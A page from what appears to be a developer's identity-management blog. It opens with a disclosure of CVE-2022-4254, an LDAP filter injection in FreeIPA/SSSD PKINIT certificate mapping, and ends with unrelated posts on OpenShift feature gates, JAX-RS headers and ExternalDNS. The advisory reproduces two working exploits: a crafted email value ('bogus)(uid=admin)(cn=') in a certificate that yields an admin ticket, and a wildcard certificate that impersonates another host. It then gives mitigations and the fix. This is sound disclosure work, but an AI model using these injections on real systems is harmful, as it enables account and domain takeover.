Fraser's IdM Blog

CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability

2023-02-02T00:00:00Z

CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability

Executive summary §

FreeIPA supports the Kerberos PKINIT protocol extension (RFC 4556). PKINIT enables a client to authenticate to the KDC using an X.509 certificate and the corresonding private key, rather than a passphrase or keytab. FreeIPA uses mapping rules to map a certificate presented during a PKINIT authentication request to the corresponding principal. The mapping filter is vulnerable to LDAP filter injection. The search result can be influenced by values in the certificate, which may be attacker controlled. In the most extreme case, an attacker could gain control of the admin account, leading to full domain takeover.

FreeIPA is not vulnerable in its default configuration. To exploit this bug requires:

PKINIT is used in the environment, with certmap rules that are susceptible to LDAP filter injection via data from the client’s certificate; and
A client certificate used for PKINIT includes data that result in the construction of an LDAP filter with a different meaning than the administrator intended. This is unlikely in general, but some use cases present a heightened risk, especially if the CA includes (or can be induced to include) client-supplied or attacker-controlled attributes in end-entity certificates.

The issue was assigned CVE-2022-4254.

Affected versions §

The problem is in libsss_certmap, which is part of SSSD. FreeIPA servers use this library in ipa_kdb Kerberos plugin implementation.

The issue was introduced in SSSD 1.15.3 (when libsss_certmap was introduced) and resolved in SSSD 2.3.1.

All supported versions of RHEL 7 were affected (the fix was released on the RHEL 7.9 bugfix stream). RHEL 8.0 up to 8.3 (inclusive) were also affected (the fix was released to the still-supported streams).

RHEL 8.4 onwards and RHEL 9 are not affected. No supported versions of Fedora are affected.

Timeline §

2017-07-25: libsss_certmap was released with SSSD 1.15.3.
2020-04-28: SSSD issue pagure#4180 / github#5135 was created, reporting a lack of sanitisation of filter substitutions in maprules.
2020-07-24: The sanitisation issue was fixed upstream and SSSD 2.3.1 is released, containing the fix.
2022-11-16: While reviewing a feature involving the use of PKINIT, I noticed that some versions of the libsss_certmap code did not seem to sanitise certificate data used in LDAP filters. I started to investigate.
2022-11-17: I succeed in exploiting the behaviour, and began internal discussions with Red Hat’s Platform Security engineering team.
2022-12-01: I sent my analysis to Red Hat’s Product Security team. CVE-2022-4254 was reserved for this issue on the same day.
2023-01-24: Planned release of fix to RHEL 7.9 sssd package, in Batch Update 20. Details of the vulnerability were made public.

Problem description §

FreeIPA supports certificate mapping rules for mapping certificates presented during PKINIT authentication to a Kerberos principal. Certmap rules are stored in the LDAP database under cn=certmaprules,cn=certmap,{basedn}. The ipa_kdb plugin uses libsss_certmap to process certmap rules. An example rule object:

dn: cn=certmap1,cn=certmaprules,cn=certmap,dc=ipa,dc=test
cn: certmap1
ipacertmapmaprule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
ipaenabledflag: TRUE
objectClass: ipacertmaprule
objectClass: top

The ipacertmaprule attribute is a string representation of an LDAP filter (RFC 4515), with substitution templates in curly braces (e.g. {subject_dn}). Template substitution is performed by the sss_certmap_get_search_filter subroutine. The supported templates are described in sss_certmap(5). They include:

{cert!base64} (base64 encoding of whole certificate)
{issuer_dn}
{subject_dn}
{subject_rfc822_name}
{subject_dns_name}

The KDC uses the resulting filter within a bigger search filter that it uses to match the principal. The filter includes the requested principal name from the Kerberos authentication service request (AS_REQ), and the maprule filter. The complete filter has the following structure (wrapped for readability):

(&
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=REQUESTED_PRINCIPAL@REQUESTED_REALM)
    (krbPrincipalName:caseIgnoreIA5Match:=REQUESTED_PRINCPAL@REQUESTED_REALM)
  )
  MAPRULE_FILTER_GOES_HERE
)

Note that the requested principal is specified by the client in the Kerberos AS_REQ. This value is properly escaped where it is inserted in the filter. But it is important to note that the client can specify any principal the maprule filter fragment matches.

Sanitisation not performed §

Some template substitutions are inherently safe, but some use values from the certificate that could contain characters with special meaning in LDAP filters. Of the substitutions listed above, only {cert!base64} is safe. The others could contain special characters (and there are still more that I did not list). Values that could contain special characters have to be sanitised (escaped). Specifically, the following characters must be replaced with a hex escape sequence:

NUL → \00
( → \28
) → \29
* → \2A
\ → \5C

The affected versions of SSSD do not perform this sanitisation. As a consequence, the template substitutions can result in invalid filters (resulting in authentication failure) or filters that match the wrong principal entry (dangerous). The next two sections demonstrate two different exploit scenarios.

LDAP filter injection has been assigned CWE-90 in the Common Weakness Enumeration database. Conceptually it is very similar to SQL injection (CWE-89).

Demo 1: Attacker-supplied `rfc822Name` §

We will issue a certificate with an attacker-supplied rfc822Name SAN value to an unprivileged user. The deployment has a plausible certmap rule with a structure that can be exploited to obtain a TGT for an attacker-specified user account, including highly privileged accounts such as admin.

It is a fresh deployment running FreeIPA 4.6 on RHEL 7.9:

# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)

# rpm -qa |grep ipa-
ipa-client-4.6.8-5.el7.x86_64
sssd-ipa-1.16.5-10.el7.x86_64
ipa-server-4.6.8-5.el7.x86_64
ipa-common-4.6.8-5.el7.noarch
ipa-client-common-4.6.8-5.el7.noarch
ipa-server-common-4.6.8-5.el7.noarch

Setup §

Setup steps establish the user account, certmap rules, certificate profiles and issuance policies required for the subsequent attack. I perform these steps using the admin account:

# klist
Ticket cache: KEYRING:persistent:0:0
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:00:19  29/11/22 23:00:07  ldap/rhel78-0.ipa.test@IPA.TEST
28/11/22 23:00:09  29/11/22 23:00:07  krbtgt/IPA.TEST@IPA.TEST

Create the unprivileged user alice. She will be the subject principal to whom the certificate will be issued.

# ipa user-add alice --first Alice --last Able --password
Password: XXXXXXXX
Enter Password again to verify: XXXXXXXX
------------------
Added user "alice"
------------------
...

Add a new mail attribute to alice’s LDAP entry. This will enable us to issue a certificate from the internal CA that includes the value as an rfc822Name Subject Alternative Name value.

# echo > mod.ldif <


I had to add the new mail attribute via ldapmodify because the
email validation performed by the IPA API does not admit all valid
local-part values. But it is in fact a valid email address.

The default access controls in FreeIPA do not allow non-admins to
modify mail attributes, even in their own entry. But I use this
approach because it is plausible for an organisation to have a
system that allows employees to request a specific mail alias.
Indeed we have such a system at Red Hat, although I don’t know if it
would allow such an exotic value.

Next, add a CA ACL rule that permits certificate to be issued to
user principals. For convenience we will use the included
caIPAserviceCert profile. Typical real world user certificate
scenarios would require a dedicated profile.
# ipa caacl-add users_caIPAserviceCert --usercat=all
-------------------------------------
Added CA ACL "users_caIPAserviceCert"
-------------------------------------
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all

# ipa caacl-add-profile users_caIPAserviceCert --certprofile caIPAserviceCert
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all
  Profiles: caIPAserviceCert
-------------------------
Number of members added 1
-------------------------
Finally add the certmap rule. It has a two-part or-list intended
to match the rfc822Name from the certificate to the mail
attribute, or else match the certificate subject DN to DN of the
LDAP entry:
# ipa certmaprule-add certmap1 --maprule \
    "(|(mail={subject_rfc822_name})(entryDN={subject_dn}))"
--------------------------------------------------
Added Certificate Identity Mapping Rule "certmap1"
--------------------------------------------------
  Rule name: certmap1
  Mapping rule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
  Enabled: TRUE

The steps performed above are not part of the exploit itself, and
they require administrator privileges to perform. They are
presented as plausible configurations, the likes of which may
exist (or not) in a customer’s environment.

Exploit §
alice will request a certificate with the suspicious rfc822Name
and acquire a TGT for the admin user. First obtain a TGT for
alice (using password authentication):
$ kinit alice
Password for alice@IPA.TEST:
Create a new keypair and certificate signing request (CSR). The
config causes the CSR to bear a SAN extension request containting
the malicious rfc822Name:
$ echo > naughty.conf <

Issue the certificate (this is a self-service certificate request,
which FreeIPA allows, subject to CA ACLs):
$ ipa cert-request naughty.csr \
    --principal alice naughty.csr \
    --certificate-out naughty.pem
  Issuing CA: ipa
  Certificate: MIIEPjCC...
  Subject: CN=alice,O=IPA.TEST 202211171708
  Subject email address: "bogus)(uid=admin)(cn="@ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 04:42:58 2022 UTC
  Not After: Fri Nov 29 04:42:58 2024 UTC
  Serial number: 13
  Serial number (hex): 0xD
Finally, use the new certificate and key to obtain a TGT for
admin:
$ kinit -X X509_user_identity=FILE:naughty.pem,naughty.key admin

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:47:44  29/11/22 23:47:44  krbtgt/IPA.TEST@IPA.TEST
The exploit succeeds because the unescaped rfc822Name value
results in a filter that matches the admin user (formatted for
readability):
(&
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=admin@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=admin@IPA.TEST)
  )
  (|
    (mail="bogus)
    (uid=admin)
    (cn="@ipa.test)
    (entrydn=CN=alice,O=IPA.TEST 202211171708)
  )
)
Demo 2: Wildcard DNS name §
A wildcard certificate can be used to obtain a TGT for a different
host principal.
Setup §
Add a profile for issuing wildcard certificates. I will skip the
details and instead refer to my blog post on this topic.
Add a host called ipa.test, a host group called webservers,
and make ipa.test a member of webservers:
# ipa host-add ipa.test --force
----------------------
Added host "ipa.test"
----------------------
  Host name: ipa.test
  Principal name: host/ipa.test@IPA.TEST
  Principal alias: host/ipa.test@IPA.TEST
  Password: False
  Keytab: False
  Managed by: ipa.test

# ipa hostgroup-add webservers
----------------------------
Added hostgroup "webservers"
----------------------------
  Host-group: webservers

# ipa hostgroup-add-member webservers --hosts ipa.test
  Host-group: webservers
  Member hosts: ipa.test
-------------------------
Number of members added 1
-------------------------
Add a CA ACL that allows webservers to be issued certificates
via the wildcard profile:
# ipa caacl-add webservers_wildcard
----------------------------------
Added CA ACL "webservers_wildcard"
----------------------------------
  ACL name: webservers_wildcard
  Enabled: TRUE

# ipa caacl-add-host webservers_wildcard --hostgroup webservers
  ACL name: webservers_wildcard
  Enabled: TRUE
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------

# ipa caacl-add-profile webservers_wildcard --certprofile wildcard
  ACL name: webservers_wildcard
  Enabled: TRUE
  Profiles: wildcard
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------
Finally, add a certmap rule that uses SAN dNSName values to locate
the principal:
# ipa certmaprule-add certmap2 \
    --maprule "(fqdn={subject_dns_name})"
--------------------------------------------------
Added Certificate Identity Mapping Rule "certmap2"
--------------------------------------------------
  Rule name: certmap2
  Mapping rule: (fqdn={subject_dns_name})
  Enabled: TRUE
Exploit §
We will issue a wildcard certificate for ipa.test, and use it to
obtain a TGT for a different host. You could use Certmonger to
request the certificate, but I will interact directly with FreeIPA
via the ipa client program. The operator is the host/ipa.test
principal (I kinited using the host keytab):
$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 03:52:59  30/11/22 03:52:59  krbtgt/IPA.TEST@IPA.TEST
Create a keypair and CSR:
$ openssl req -new -subj '/CN=ipa.test/' -nodes \
    -keyout server.key -out server.csr
Generating a 2048 bit RSA private key
........................................................+++
.....................................................................................................................+++
writing new private key to 'server.key'
-----
Request the certificate, being sure to specify the wildcard
profile:
$ ipa cert-request server.csr \
    --principal host/ipa.test \
    --profile-id wildcard \
    --certificate-out server.pem
  Issuing CA: ipa
  Certificate: MIIENTCC...
  Subject: CN=ipa.test,O=IPA.TEST 202211171708
  Subject DNS name: ipa.test, *.ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 09:14:09 2022 UTC
  Not After: Fri Nov 29 09:14:09 2024 UTC
  Serial number: 16
  Serial number (hex): 0x10
Finally, use the new certificate and key to obtain a TGT for a
different host whose fqdn attributes matches the LDAP
substring filter (fqdn=*.ipa.test). In this example I acquire the
TGT for host/rhel78-0.ipa.test (one of the FreeIPA servers).
$ kinit -X X509_user_identity=FILE:server.pem,server.key \
    host/rhel78-0.ipa.test

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/rhel78-0.ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 04:15:52  30/11/22 04:15:52  krbtgt/IPA.TEST@IPA.TEST
The exploit succeeds because the unescaped wildcard dNSName value
results in a substring match filter (formatted for
readability):
(&
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=host/rhel78-0.ipa.test@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=host/rhel78-0.ipa.test@IPA.TEST)
  )
  (fqdn=*.ipa.test)
)
The maprule filter matches any principal whose fqdn attribute ends
in .ipa.test. This sub-filter could match multiple principle
entries, but the client-specified principal name used in the
krbPrincipalName and ipaKrbPricipalAlias filters select the one
we want.
If there are multiple SAN values of the relevant type, the order is
important. The last value is used in the template substitution.
In my certificate, the last value is *.ipa.test so the exploit
succeeds. If the order was reversed, the exploit would not succeed.
This is an implementation detail of SSSD; it might as well have used
the first value but it just happened to be implemented this way.
Discussion §
These exploits required a confluence of contributing factors to
succeed. Deployments using PKINIT with exact certificate matching
(the default) are also unaffected. The vulnerability only arises
when the customer uses certmap rules. None are defined by default.
Certmap rules (if they exist) are only potentially vulnerable;
several other factors have to come together.
The attacker must obtain a valid certificate from a trusted CA for a
key they control. Except in limited cases (e.g. wildcard DNS names)
the attacker must to be able to influence the attributes on the
certificate. Only free-form string attributes are potentially
problematic. These include DNS name, email address, SAN DN values,
principle names, and perhaps others. And there have to be SSSD
certmap rule template substitutions for the targeted attribute(s).
Next, there had to be a certmap rule that substitutes the
problematic value into the LDAP search filter. All filters that
substitute free-form attributes are susceptible to exploitation.
But in practice, or-list filters are more susceptible to
exploitation than and-list or single-clause filters. This is
because the attacker has more flexibility in how to make the filter
match the target account. But as we saw in the wildcard dNSName
example, even a single-clause filter fragment could be exploitable.

The default ACIs allow any authenticated account to read certmap
rule entries. This may aid attackers in working out the attack
details.

Note that most free-form attributes have additional syntax rules
imposed upon them. For example, a SAN dNSName value should look
like a DNS name, and a SAN rfc822Name value should be a valid
email address. But the raw ASN.1 data does not guarantee this.
Even legal values can be problematic (as demonstrated). But if a
trusted CA can be induced to issue certificates that contain
arbitrary data in those free-form attributes, there is an even
greater risk of exploitation.
The use of the internal CA in this attack is incidental. The
administrator can configure FreeIPA to trust external CAs for
validating client PKINIT certificates. Any trusted CA can be used
in the attack, if the attacker can cause it to issue certificates
containing problematic values. Note that the KDC trusts the whole
system trust store, not just the trusted CAs from the FreeIPA CA
trust store. Certmap rules can be equipped with matching rules to
restrict which issuers are allowed for PKINIT certificate matching,
separate from CA trust for certification path verification purposes.
Mitigations §
Use exact certificate matching / do not use certmap rules §
PKINIT uses exact certificate matching by default. If feasible, you
can rely on that method and disable or delete any certmap rules.
ipa certmaprule-find lists all certmap rules that have been
defined. Use ipa certmaprule-disable NAME or ipa certmaprule-del NAME to disable or delete certmap rules, respectively.
The main drawback to this approach is that each principal’s entry
must have an up-to-date userCertificate attribute containing the
user’s certificate(s). This increases the size of entries, and may
have additional adminstrative overhead depending on how certificates
are issued and managed.
Audit and de-risk certmap rules §
Non-santised parameter substitution in an LDAP filter or-list is
riskier than in and-lists lists or single . Replace certmap rules
containing or lists with multiple, separate certmap rules.
Ensure each rule is as specific as possible, and consider the
possibility of outlier or malicious values in the certificate when
designing certmap rules.
Review CA trust, profiles and validation §
Review the kinds of data, especially user-supplied or user-writeable
data, that can be included on certificates issued by CAs that are
trusted for PKINIT purposes. Audit how those data are validated.
Review and limit which CAs are trusted for PKINIT to only those that
are necessary. If possible, consider using dedicated CAs for
issuing the client certificates used for PKINIT. Use the certmap
matching rule feature (not discussed here) to restrict the KDC to
only allow certificates issued by the PKINIT CAs.
Fix §
Lack of sanitisation in certmap LDAP filter construction was
recognised as a bug in SSSD issue pagure#4180 / github#5135.
The framing of the issue was that legitimate values in the
certificate were causing SSSD to construct invalid LDAP filters. It
appears that the security implications were not recognised or
discussed at that time.
SSSD commit a2b9a84460429181f2a4fa7e2bb5ab49fd561274
implemented the required sanitisation. SSSD 2.3.1 was the first
release containing the fix. Commit
918fb32af6a271230bf87db47f78768edb9ca86c on
2022-01-06 backported the fix to the sssd-1.16 branch, but
there has not yet been a new release from this branch containing the
fix.
The SSSD team backported the fix to RHEL 7.9. It was included in
Batch Update 20 which was released on 2022-01-24. Fixes to
extended support streams for RHEL 8.1 and 8.2 were also released on
that day, meaning that the issue is now fixed in all supported
versions of RHEL.



Enabling Kubernetes feature gates in OpenShift
2023-01-22T00:00:00Z
Enabling Kubernetes feature gates in OpenShift
When Kubernetes adds a feature or changes an existing one, the new
behaviour usually starts out hidden behind a feature
gate. Enhancements start off in the Alpha
stability class, where they are usually guarded by a feature gate
that is off by default. If the enhancement proves stable and
useful, after a few releases it will be promoted to Beta, and the
feature gate will typically default to on, though it can still
be disabled. The final stage of an enhancement is GA (generally
available). If an enhancement reaches this stage, its feature gate
becomes non-operational and is deprecated, to be removed in a
later release.
So, in a real world deployment how do you enable or disable a
feature gate? There are several “distributions” of Kubernetes and
various ways of doing it. In this short post I’ll demonstrate how
to enable feature gates in OpenShift, Red Hat’s container
orchestration platform which is built on Kubernetes.
The FeatureGate resource §
OpenShift recognises a FeatureGate resource type. A single,
resource of this type named cluster determines the feature gates
used across the cluster. A cluster administrator can modify
FeatureGate/cluster to vary the feature gates set in the cluster
from the defaults.
The FeatureGate resource is more than a mere list of feature gates
to enable or disable. First, in addition to Kubernetes feature
gates, it can also set feature gates for features in OpenShift
itself, or other components or products in the cluster. Second, it
can refer to named feature sets—groups of feature gates—as an
alternative to explicitly listing all the feature gates to enable or
disable.
For example, the TechPreviewNoUpgrade feature set enables a
collection of features that Red Hat have marked as useful and worthy
of customer testing, with a view to possible promotion to full
support in a future release. Customers do not need to enable
individual feature gates but can instead enable all the Technology
Preview features via the following FeatureGate spec:
apiVersion: config.openshift.io/v1
kind: FeatureGate
metadata:
  name: cluster
spec:
  featureSet: TechPreviewNoUpgrade

Unlike the more general MachineConfig objects, FeatureGate
objects do not get composed together. Only the single object name
cluster is recognised. So there is no “lightweight” way to enable
all the feature gates from TechPreviewNoUpgrade plus one or two
additional feature gates. To accomplish that, use a
CustomNoUpgrade with all the desired feature gates listed.

Enabling specific feature gates §
What if the TechPreviewNoUpgrade feature set does not include the
feature gate you want to enable? The CustomNoUpgrade feature set
allows you to list the specific feature gates you want to enable or
disable. The following exmaple enables the
UserNamespaceStatelessPodsSupport feature gate:
apiVersion: config.openshift.io/v1
kind: FeatureGate
metadata:
  name: cluster
spec:
  featureSet: CustomNoUpgrade
  customNoUpgrade:
    enabled:
    - UserNamespacesStatelessPodsSupport
Applying FeatureGate changes §
When you change FeatureGate/cluster, new MachineConfig objects
get generated containing updated configurations of the relevant
Kubernetes and OpenShift components (e.g. kubelet). Machine
Config Operator will progressively update and restart the nodes in
the cluster, while ensuring availability.
Let’s see an example. First, observe that all MachineConfigPools
are up to date (ready count = machine count):
% oc get MachineConfigPool -o json | jq --compact-output \
    '.items[] | { name: .metadata.name \
                , count: .status.machineCount \
                , ready: .status.readyMachineCount}'
{"name":"master","count":3,"ready":3}
{"name":"worker","count":3,"ready":3}
Also observe that the FeatureGate/cluster object does exist, but
its spec is empty (so the default feature gate settings are used):
% oc get -o json FeatureGate/cluster | jq .spec
{}
Now update the FeatureGate/cluster object. Assume the
CustomNoUpgrade configuration shown earlier resides in a file
named featuregate-userns.yaml.
% oc replace -f featuregate-userns.yaml
featuregate.config.openshift.io/cluster replaced
After a few moments, Machine Config Operator will observe the new
configuration and start updating and restarting the nodes.
Initially, all pools have zero machines in state ready (because
they all need updating):
% oc get MachineConfigPool -o json | jq --compact-output \
    '.items[] | { name: .metadata.name \
                , count: .status.machineCount \
                , ready: .status.readyMachineCount}'
{"name":"master","count":3,"ready":0}
{"name":"worker","count":3,"ready":0}
After some period of time (which will vary by cluster size), all the
nodes will have received the updated configuration and restarted.
As for verifying that the updates were applied correctly, that will
depend on which gates are being enabled or disabled. It is out of
scope for this article. But in terms of how to set feature flags
in OpenShift, I hope that this article has conveyed it clearly and
that it will be useful to others.
For further detail, see the official OpenShift FeatureGate
documentation and FeatureGate object
schema.


Controlling header formatting in JAX-RS applications
2022-08-29T00:00:00Z
Controlling header formatting in JAX-RS applications
I’m been implementing an Enrollment over Secure Transport
(EST) service in Dogtag PKI. During testing, I found
that a notable client implementation parses the response
Content-Type header in the following way:
if (!strncmp(
    multipart_get_data_content_type(parser),
    "application/pkcs7-mime; smime-type=certs-only",
    45)
  ) {
    ...
The Dogtag EST service is a Jakarta RESTful Web Services
(JAX-RS) application. It produces a Content-Type header
value different from what the client expects (note the lack of
whitespace):
application/pkcs7-mime;smime-type=certs-only
As a consequence, the EST client fails to process the response.
This is certainly a defect in the EST client implementation. But
EST is used by many embedded or hard to update network devices. Or
updates might not be available (now, ever?)
So, I needed to find a way to override the header default header
formatting. This blog post describes my solution.
Specifying the Content-Type header §
The JAX-RS @Produces annotation specifies the Content-Type
header value for a particular resource:
@POST
@Path("simpleenroll")
@Consumes("application/pkcs10")
@Produces("application/pkcs7-mime; smime-type=certs-only")
public Response simpleenroll(byte[] data) {
    ...
Note that the string value is not used verbatim. Instead, it is
parsed into a MediaType value and stored as such in
the response headers (a MultivaluedMap).
When serialising the Response, header values are stringified via
types that implement the
RuntimeDelegate.HeaderDelegate interface,
where T is the real type of the header value Object. To
serialise a MediaType header value, the JAX-RS machinery uses a
instance of a a class that implements
RuntimeDelegate.HeaderDelegate.
HeaderDelegate implementations are not part of the JAX-RS API.
They are provided by the JAX-RS implementation. In Dogtag PKI,
that’s RESTEasy. The class in question is:
public class MediaTypeHeaderDelegate
  implements RuntimeDelegate.HeaderDelegate<MediaType> {
The toString(MediaType type) method provided by this class prints
the value without a space character between the subtype and the
parameters. For the example resource above, it produces the string:
application/pkcs7-mime;smime-type=certs-only
This is a legal production in the HTTP grammar, according to RFC
7230 and RFC 7231:
media-type = type "/" subtype *( OWS ";" OWS parameter )
OWS = *( SP / HTAB )
However, we already saw that at least one EST client is unable to
process this value, because it expects a space character before the
parameters:
application/pkcs7-mime; smime-type=certs-only
This is also a legal production. But the client is using strncmp
to look for this exact string, instead of properly parsing the
value. If we can’t fix the client behaviour, we have to find a
workaround on the server to produce the exact string the client
expects.
Idea 1: custom HeaderDelegate §
My first idea was to override the HeaderDelegate with
our own implementation. I couldn’t find a general way to do that
via the JAX-RS API. It does seem that you can do it using RESTEasy
classes directly:

Implement the custom HeaderDelegate. To avoid
unnecessary work you could extend RESTEasy’s
MediaTypeHeaderDelegate and override just the
toString(MediaType) method.
Obtain ResteasyProviderFactory.getInstance(). Invoke
.addHeaderDelegate(MediaType.class, customInst) to replace the
HeaderDelegate.

This approach has several disadvantages:

Directly coupled to the RESTEasy implementation. May break if
RESTEasy implementation details change and will not work with
other JAX-RS implementations.
Need to implement a custom HeaderDelegate with the
“correct” serialisation behaviour.
The “correct” serialisation behaviour might break other clients
with different bugs/quirks.

For these reasons I rejected the first idea and sought an approach
that avoids these disadvantages.
Idea 2: response filter §
My next idea was to use a response filter to reformat the
Content-Type response header. The Servlet API defines the
ContainerResponseFilter interface:
public interface ContainerResponseFilter {
  void filter(
      ContainerRequestContext requestContext,
      ContainerResponseContext responseContext)
    throws IOException
}
The application applies each registered filter to each response,
before serialising and sending the response. At the time response
filters are applied, the Content-Type header value is a
MediaType. It has not yet been converted to a String.
A response filter can add, remove, or replace response headers.
Recall that headers are stored in a MultivaluedMap. This means that we can replace a MediaType value (whose
serialisation is determined by the HeaderDelegate) with a String
value (which will be written as is).
The .equals equality test for MediaType properly compares the
properties of the instance without regard to string representation.
As it should. This enables a succinct implementation where we:

Decalre verbatim String header values we want to see in the
response.
Parse those strings into MediaType values.
Match the Content-Type value in the response against parsed
values.
Replace matched header values with the corresponding verbatim
String.

The implementation is straightforward:
@Provider
public class ReformatContentTypeResponseFilter
    implements ContainerResponseFilter {

  private static String[] verbatim = {
    "application/pkcs7-mime; smime-type=certs-only"
  };

  private static HashMap<MediaType, String> substitutions =
    new HashMap<>();

  static {
    for (String s : verbatim)
      substitutions.put(MediaType.valueOf(s), s);
  }

  @Override
  public void filter(
      ContainerRequestContext requestContext,
      ContainerResponseContext responseContext) {
    MultivaluedMap<String, Object> headers =
      responseContext.getHeaders()
    Object v = headers.getFirst(HttpHeaders.CONTENT_TYPE);
    if (v != null && v instanceof MediaType
        && substitutions.containsKey(v)) {
      headers.putSingle(
        HttpHeaders.CONTENT_TYPE, substitutions.get(v));
    }
  }

}
There is currently only one header value whose formatting I need to
precisely control. If we discover more, we only need to add the
desired string serialisation to the verbatim array.
We must consider the possible scenario of different clients with
different quirks. In that case, we could maintain separate
substitutions maps for each known problematic client. We would use
the User-Agent header, or other request characteristics, to
identify the client and select the corresponding substitution map
(if any). Hopefully this situation does not arise. But if it does,
the increase in complexity of the solution is tolerable.
This solution works well and avoids the disadvantages of my first
idea:

Only uses official Servlet and JAX-RS classes and interfaces.
This solution will work across all JAX-RS implementations.
Does not (re)implement MediaType serialsation. You just declare
the exact string values you want to see in responses.
With a moderate increase in complexity, can handle different
clients with incompatible quriks.

Conclusion §
It’s unfortunate that this workaround was even necessary. But given
that it was, I’m happy with the solution. It is simple and portable
across Servlet and JAX-RS implementations.
The same approach could be used for controlling formatting of any
header value types, not just Content-Type / MediaType. I hope
that sharing this solution will help people who encounter similar
problems. At the very least, I hope that because of this post you
learned something about Servlet and JAX-RS response header
processing.


Experimenting with ExternalDNS
2022-03-24T00:00:00Z
Experimenting with ExternalDNS
DNS is a critical piece of the puzzle for exposing Kubernetes-hosted
applications to the Internet. Running the application means nothing
if you can’t get traffic to it. Keeping public DNS records in sync
with the deployed applications is important. The Kubernetes
ExternalDNS was developed for this purpose.
ExternalDNS exposes Kubernetes Services and Routes in by managing
records in external DNS providers. It supports many DNS
providers, including the DNS services of the popular
cloud providers (AWS, Google Cloud, Azure, …).
I have been experimenting with ExternalDNS. My purpose is not only
to understand installation and basic usage, but also whether it can
meet the specific DNS requirements of FreeIPA, such as SRV
records. This post outlines my findings.
Operator installation §
The ExternalDNS controller is a Kubernetes sub-project (or
SIG—special interest group). In the OpenShift ecosystem, the
ExternalDNS Operator creates and manages ExternalDNS controller
instances defined by custom resources (CRs) of kind: ExternalDNS.
The ExternalDNS Operator is available as a Tech Preview in
OpenShift Container Platform 4.10. So, it is visible in the
OperatorHub catalogue out-of-the-box. The official docs
explain how to install the operator via the OperatorHub web console.
The instructions were easy to follow.
I prefer using the CLI where possible. The OperatorHub system is
complex but I eventually worked out what commands and objects are
needed to install the ExternalDNS Operator from the CLI.
First, create the operand namespaces and RBAC objects. The
operand namespace is where the ExternalDNS controllers (as opposed
to the ExternalDNS Operator controller) will live.
$ oc create ns external-dns
namespace/external-dns created

$ oc apply -f \
    https://raw.githubusercontent.com/openshift/external-dns-operator/release-0.1/config/rbac/extra-roles.yaml
role.rbac.authorization.k8s.io/external-dns-operator created
rolebinding.rbac.authorization.k8s.io/external-dns-operator created
clusterrole.rbac.authorization.k8s.io/external-dns created
clusterrolebinding.rbac.authorization.k8s.io/external-dns created
Next, create the external-dns-operator namespace where the
operator itself shall live:
% oc create ns external-dns-operator
namespace/external-dns-operator created
Finally create the OperatorGroup and OperatorHub Subscription
objects. Note the contents of external-dns-operator.yaml:
apiVersion: operators.coreos.com/v1
kind: OperatorGroup
metadata:
  generateName: external-dns-operator-
  namespace: external-dns-operator
spec:
  targetNamespaces:
  - external-dns-operator
---
apiVersion: operators.coreos.com/v1alpha1
kind: Subscription
metadata:
  name: external-dns-operator
  namespace: external-dns-operator
spec:
  name: external-dns-operator
  source: redhat-operators
  sourceNamespace: openshift-marketplace
Create the objects:
% oc create -f external-dns-operator.yaml
operatorgroup.operators.coreos.com/external-dns-operator-8852w created
subscription.operators.coreos.com/external-dns-operator created
After a short delay (~1 minute for me) the operator installation
should finish. Observe the various Kubernetes objects that
represent the running operator:
% oc get -n external-dns-operator all
NAME                                         READY   STATUS    RESTARTS      AGE
pod/external-dns-operator-594b465984-r2pc5   2/2     Running   2 (59s ago)   5m13s

NAME                                            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE
service/external-dns-operator-metrics-service   ClusterIP   172.30.151.142           8443/TCP   5m15s
service/external-dns-operator-service           ClusterIP   172.30.210.21            9443/TCP   59s

NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/external-dns-operator   1/1     1            1           5m14s

NAME                                               DESIRED   CURRENT   READY   AGE
replicaset.apps/external-dns-operator-594b465984   1         1         1       5m15s
The ExternalDNS custom resource §
Now that the operator is installed, we can define an ExternalDNS
customer resource (CR). The operator creates an ExternalDNS
controller instance for each CR. Here is an example
(externaldns-test.yaml):
apiVersion: externaldns.olm.openshift.io/v1alpha1
kind: ExternalDNS
metadata:
  name: test
spec:
  domains:
    - filterType: Include 
      matchType: Exact 
      name: ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com
  provider:
    type: GCP
  source:
    type: Service
    service:
      serviceType:
        - LoadBalancer
    labelFilter:
      matchLabels:
        app: echo
    fqdnTemplate:
      - "{{.Name}}.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com"
Breaking down the spec, we see the following fields:

domains gives a rule for which domains this ExternalDNS
controller must manage. In this case, any domain name with a
suffix matching the name subfield will match the rule.
provider specifies the cloud provider—in this case GCP
(Google Cloud). For GCP there is nothing else to configure; the
controller will use the main cluster secret to authenticate to
Google Cloud.
source specifies which kinds of objects the controller will
